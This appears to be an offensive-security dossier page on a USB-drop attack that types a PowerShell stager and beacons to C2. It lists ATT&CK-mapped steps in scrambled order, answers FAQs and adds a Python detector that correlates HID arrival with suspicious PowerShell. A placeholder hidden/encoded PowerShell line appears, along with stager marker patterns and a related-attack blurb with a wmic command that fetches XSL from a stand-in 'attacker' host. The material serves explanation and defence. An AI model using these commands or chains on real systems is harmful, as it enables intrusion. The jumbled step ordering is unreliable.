USB drop in parking lot → HID payload → C2
Drop branded-looking USB sticks near the target site. An employee plugs one in; a Rubber-Ducky-class HID device types a PowerShell payload that connects out to attacker C2.
§ Context
Assumed environment: target has employees in / out of the building, USB ports unrestricted on workstations (no Device Control / EDR USB block). Outbound HTTPS to commodity hosts allowed.
§ Steps
- 01 PowerShell stager runs (Execution; T1059 — Command and Scripting Interpreter)
- 02 Beacon to attacker C2 (Command and Control; T1071 — Application Layer Protocol)
- 03 Curious employee plugs in (Execution; T1204 — User Execution)
- 04 Local persistence on workstation (Persistence; W-SCHEDTASK-HIJACK — Scheduled Task Hijack)
- 05 Drop sticks in parking lot / lobby (Initial Access; SE-PRETEXT — Pretexting)
- 06 Build HID payload (Ducky Script) (Initial Access; SE-USB-DROP — USB Drop / HID Attack)
§ References
§ Frequently asked
- What is the "USB drop in parking lot → HID payload → C2" attack path?
- Drop branded-looking USB sticks near the target site. An employee plugs one in; a Rubber-Ducky-class HID device types a PowerShell payload that connects out to attacker C2. It chains 6 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is PowerShell stager runs (T1059) — an execution primitive. Assumed environment: target has employees in / out of the building, USB ports unrestricted on workstations (no Device Control / EDR USB block).
- What is the final impact of this kill-chain?
- The final step lands on Build HID payload (Ducky Script) (SE-USB-DROP), which falls under Initial Access. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.
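One concrete detection for the middle of this chain, added here as an example and not part of the dossier or of any referenced ATT&CK entry: the HID device has to be enumerated by Windows before it can type, and the typed stager has to start PowerShell. Correlating a new HID/keyboard device arrival (Security event 6416, from the Audit PNP Activity subcategory) with a PowerShell launch carrying hiding/encoding flags (Security event 4688 with command-line logging enabled) on the same host within a short window catches the pattern without caring what the payload is. The event records below are constructed, the EventData field names (ClassName, NewProcessName, CommandLine) are assumed to match your exporter, and the 90-second window and two-marker-family threshold are assumptions to tune against your own baseline.

```python
"""Correlate new-HID-device arrival with a suspicious PowerShell launch.

Added example over constructed Windows Security events, not real telemetry.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta


@dataclass
class Event:
    """One Windows Security event reduced to the fields the detector needs."""
    ts: datetime
    host: str
    event_id: int
    data: dict = field(default_factory=dict)


# Marker families typical of a typed-in stager. A hit in two or more distinct
# families counts as suspicious, so a lone -NoProfile from an admin script
# does not fire on its own. Thresholds and patterns are assumptions.
MARKER_FAMILIES = {
    "hidden_window": ("-w hidden", "-windowstyle hidden"),
    "no_profile": ("-nop", "-noprofile"),
    "policy_bypass": ("-ep bypass", "-executionpolicy bypass"),
    "encoded": ("-enc", "-encodedcommand"),
    "download": ("downloadstring", "downloadfile", "invoke-webrequest", "iwr "),
    "eval": ("iex", "invoke-expression"),
}
HID_CLASSES = {"hidclass", "keyboard"}  # device setup classes a keystroke injector enumerates as


def is_hid_arrival(ev: Event) -> bool:
    """Security 6416 (new external device recognised) restricted to HID/keyboard classes."""
    return ev.event_id == 6416 and ev.data.get("ClassName", "").lower() in HID_CLASSES


def powershell_marker_families(cmdline: str) -> set:
    """Return the set of marker families present in a command line."""
    low = cmdline.lower()
    return {fam for fam, pats in MARKER_FAMILIES.items() if any(p in low for p in pats)}


def is_suspicious_powershell(ev: Event, min_families: int = 2) -> bool:
    """Security 4688 for powershell.exe/pwsh.exe whose command line hits >= min_families."""
    if ev.event_id != 4688:
        return False
    exe = ev.data.get("NewProcessName", "").lower()
    if not exe.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return False
    return len(powershell_marker_families(ev.data.get("CommandLine", ""))) >= min_families


def correlate(events, window: timedelta = timedelta(seconds=90)) -> list:
    """Alert when a suspicious PowerShell launch follows a HID arrival on the same host within window."""
    alerts = []
    recent_hid = {}  # host -> timestamps of HID arrivals seen so far
    for ev in sorted(events, key=lambda e: e.ts):
        if is_hid_arrival(ev):
            recent_hid.setdefault(ev.host, []).append(ev.ts)
        elif is_suspicious_powershell(ev):
            for t in recent_hid.get(ev.host, []):
                delta = ev.ts - t
                if timedelta(0) <= delta <= window:
                    alerts.append({
                        "host": ev.host,
                        "hid_arrival": t,
                        "process_start": ev.ts,
                        "seconds_between": int(delta.total_seconds()),
                        "command_line": ev.data.get("CommandLine", ""),
                    })
                    break
    return alerts


# Constructed sample telemetry. WS-0117 shows the pattern; WS-0042 is a user
# plugging in a keyboard and later running a plain script; WS-0203 has the
# flags but no device arrival, so it is triage material, not this alert.
T0 = datetime(2024, 5, 6, 9, 14, 0)
SAMPLE_EVENTS = [
    Event(T0 + timedelta(seconds=2), "WS-0117", 6416,
          {"ClassName": "HIDClass", "DeviceDescription": "USB Input Device"}),
    Event(T0 + timedelta(seconds=9), "WS-0117", 4688,
          {"NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           "CommandLine": "powershell.exe -nop -w hidden -enc <BASE64_PLACEHOLDER>"}),
    Event(T0 + timedelta(minutes=3), "WS-0042", 6416,
          {"ClassName": "Keyboard", "DeviceDescription": "USB Keyboard"}),
    Event(T0 + timedelta(minutes=3, seconds=40), "WS-0042", 4688,
          {"NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           "CommandLine": r"powershell.exe -File C:\Scripts\Inventory.ps1"}),
    Event(T0 + timedelta(minutes=5), "WS-0203", 4688,
          {"NewProcessName": r"C:\Program Files\PowerShell\7\pwsh.exe",
           "CommandLine": "pwsh.exe -NoProfile -ExecutionPolicy Bypass -File Deploy.ps1"}),
]


if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"{a['host']}: PowerShell {a['seconds_between']}s after HID arrival -> {a['command_line']}")
```

Both inputs need auditing to be switched on beforehand: 6416 comes from the Audit PNP Activity subcategory, and 4688 only carries the command line when "Include command line in process creation events" is enabled. The same correlation is what a Device Control policy pre-empts: if unknown HID classes are blocked at enumeration, the 6416 event never leads anywhere.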
§ Related dossiers
- certutil + bitsadmin → AV-friendly stager chain (shared techniques: 3)
  Initial access dropped a tiny .bat. It uses certutil to decode a base64 blob and bitsadmin to fetch the real beacon, then schtasks for persistence. Every binary is signed Microsoft.
- wmic + XSL → AppLocker / SRP bypass (shared techniques: 2)
  wmic os get /format:'http://attacker/x.xsl' renders the result by fetching attacker XSL. The XSL contains JScript blocks — runs in wmic's signed-binary context, bypasses allowlisting.
- ISO container → LNK → stage from CDN → C2 (shared techniques: 2)
  Email attaches an ISO. Windows mounts it as a drive, bypassing Mark-of-the-Web. LNK inside runs a hidden binary that pulls the real stager from a CDN — Defender often misses the chain.
- OneNote .one attachment → embedded payload → C2 (shared techniques: 2)
  OneNote .one file with a friendly 'Double-click to view' overlay hides an embedded HTA / VBS / EXE. Effective initial access vector after Microsoft blocked internet macros in 2022.
- Compromised vendor mailbox → reply-chain phishing → client compromise (shared techniques: 2)
  Take over a vendor / partner mailbox via AITM phishing. Reply to an existing thread with a malicious link — trust transferred from the genuine prior conversation defeats most user training.
- Gatekeeper bypass → unsigned binary execution (shared techniques: 2)
  Deliver a payload that strips the com.apple.quarantine xattr (via .dmg with no quarantine attribute or an archive format that doesn't preserve xattrs) — Gatekeeper never prompts.